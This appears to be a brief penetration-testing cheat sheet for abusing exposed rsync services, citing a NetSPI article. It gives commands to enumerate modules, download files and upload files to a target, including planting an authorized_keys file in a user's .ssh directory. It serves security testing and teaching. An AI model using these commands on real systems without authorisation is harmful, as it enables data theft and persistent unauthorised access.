# rsync [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/) ## Enumerate ```sh rsync <target-IP>:: rsync <target-IP>::files rsync <target-IP>::files/foo/ ``` ## Downloads ```sh rsync <user>@<target-IP>::/files/foo/bar.txt . rsync -r <user>@<target-IP>::/files/foo . ``` ## Uploads ```sh rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/ rsync -r documents <user>@<target-IP>::/files/foo/ ```